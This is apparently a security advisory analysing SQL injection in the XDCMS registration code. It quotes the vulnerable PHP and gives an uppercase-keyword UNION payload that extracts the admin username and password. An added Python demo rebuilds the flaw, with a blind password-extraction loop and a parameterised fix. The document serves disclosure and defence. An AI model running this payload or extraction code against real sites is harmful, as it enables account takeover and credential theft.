XDCMS registered-user SQL injection vulnerability analysis - vulnerability warning - the black bar safety net

ID MYHACK58:62201441641
Type myhack58
Reporter xfkxfk
Modified 2014-01-03T00:00:00


The latest version of the XDCMS enterprise management system filters input too loosely; the filter can be bypassed, resulting in several SQL injections.

The injection is in the registration function of the XDCMS enterprise management system; see the file \system\modules\member\index.php:

Registration calls register_save; the problem lies in the register_save function in index.php:

public function register_save(){
    $username=safe_html($_POST['username']);// read the username; safe_html() is the only filter applied to it
    // ... (password, password2, ip and the extra field values are read here; elided in the original excerpt)

    if(!strlength($username,5)){
        showmsg(C('username').C('str_len_error').' 5','-1');
    }
    if(!strlength($password,5)){
        showmsg(C('password').C('str_len_error').' 5','-1');
    }
    if($password!=$password2){
        // ... (mismatch error; elided in the original excerpt)
    }

    $user_num=$this->mysql->num_rows("select * from ".DB_PRE."member where username='$username'");// checks whether the member already exists; $username can bypass the filter and is concatenated straight into the query: the first SQL injection
    // ...

    $this->mysql->db_insert('member',"username='".$username."',password='".$password."',creat_time='".datetime()."',last_ip='".$ip."',is_lock='0',logins='0',groupid='1'");// inserts the main fields (username, password); $username is concatenated again: the second SQL injection

    //Insert the subsidiary fields
    foreach($fields as $k=>$v){
        // ... (the user-supplied value for field $k is read into $f_value; elided in the original excerpt)
        $field_sql.=",{$k}='{$f_value}'";// no filtering at all here; goes straight into the update statement below: the third SQL injection
    }
    // ...
    $field_sql="update ".DB_PRE."member set {$field_sql} where userid={$last_id}";
    // ...
    showmsg(C('register_success'),'index.php?m=member&f=register');
}


For the first SQL injection, register a user and capture the registration request:

Finally, look at the result: the administrator's username and password are obtained successfully:

Although safe_html does filter SQL-injection keywords, and also filters = and and, it does not consider case: only lowercase keywords are filtered, so we bypass it with uppercase. Because = and and are filtered, we use a conventional error-based SQL injection statement that needs neither * nor =. This is the rand(0)/GROUP BY double-query trick: grouping on a key built from round(rand(0)) collides, MySQL raises a "Duplicate entry" error, and the error message carries the admin username and password (0x23 is '#', used as the separator). The EXP is as follows:

Enter the following in the username field:

' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM c_admin LIMIT 0,1))a FROM information_schema.tables GROUP BY a)b#
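The following Python script is an added example, not code from the advisory or from XDCMS. It rebuilds the register_save username check against an in-memory SQLite database to show three things: that a lowercase-only keyword blacklist (a hypothetical reconstruction of safe_html, since the real function is not on the page) passes an uppercase payload untouched; that the "username already exists" check at the first injection point then becomes a boolean oracle which leaks the admin password one character at a time using neither = nor and (the advisory's rand(0)/GROUP BY payload relies on MySQL's displayed "Duplicate entry" error, which SQLite does not produce, so this example uses the blind form that the same injection point also allows); and that binding the value as a query parameter stops it. The table names c_member and c_admin, the column layout and the sample rows are constructed for this example.

```python
import sqlite3
import string

# Hypothetical reconstruction of safe_html()'s keyword blacklist as the advisory
# describes it: lowercase tokens only, removed by plain substring replacement.
# The real XDCMS function is not reproduced on the page.
BLACKLIST = ("union", "select", "and", "=", "insert", "update")


def safe_html(value: str) -> str:
    """Strip blacklisted tokens; never case-folds, so 'UNION' survives."""
    for token in BLACKLIST:
        value = value.replace(token, "")
    return value


def build_db() -> sqlite3.Connection:
    """Constructed sample schema: a 3-column member table and an admin table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE c_member (userid INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("CREATE TABLE c_admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO c_member (username, password) VALUES ('alice', 'pw')")
    con.execute("INSERT INTO c_admin (username, password) VALUES ('admin', 's3cr3t')")
    con.commit()
    return con


def username_taken_vulnerable(con: sqlite3.Connection, username: str) -> bool:
    """Mirrors num_rows("select * from ...member where username='$username'"):
    safe_html() is the only defence and the value is concatenated into the SQL."""
    username = safe_html(username)
    sql = f"SELECT * FROM c_member WHERE username='{username}'"
    return len(con.execute(sql).fetchall()) > 0


def username_taken_safe(con: sqlite3.Connection, username: str) -> bool:
    """Hardened form: the value is bound, so it can only ever be a string literal."""
    sql = "SELECT * FROM c_member WHERE username=?"
    return len(con.execute(sql, (username,)).fetchall()) > 0


def oracle_payload(pos: int, ch: str) -> str:
    """Uppercase keywords dodge the lowercase blacklist; IN (...) replaces '=' and
    no 'and' is needed. '--' ends the statement in SQLite (MySQL would use '#')."""
    return (f"' UNION SELECT 1,2,3 FROM c_admin "
            f"WHERE substr(password,{pos},1) IN ('{ch}')--")


def leak_admin_password(con: sqlite3.Connection, oracle, max_len: int = 32) -> str:
    """Blind extraction: a non-empty result set means 'username exists', so each
    request answers one yes/no question about one character of the password."""
    alphabet = string.ascii_letters + string.digits  # quote-free, so no escaping needed
    leaked = ""
    for pos in range(1, max_len + 1):
        hit = next((ch for ch in alphabet if oracle(con, oracle_payload(pos, ch))), None)
        if hit is None:  # substr() past the end yields '' -> no match -> finished
            break
        leaked += hit
    return leaked


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", leak_admin_password(db, username_taken_vulnerable))  # s3cr3t
    print("parameterised:", repr(leak_admin_password(db, username_taken_safe)))  # ''
```

Parameter binding fixes the first two injection points (the value in the existence check and in the insert) but not the third: the update statement interpolates field names as `{$k}`, and identifiers cannot be bound, so those need to be checked against a fixed allowlist of column names. Making the blacklist case-insensitive would only move the goalposts, since the payload above already needs no = and no and.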

Author: xfkxfk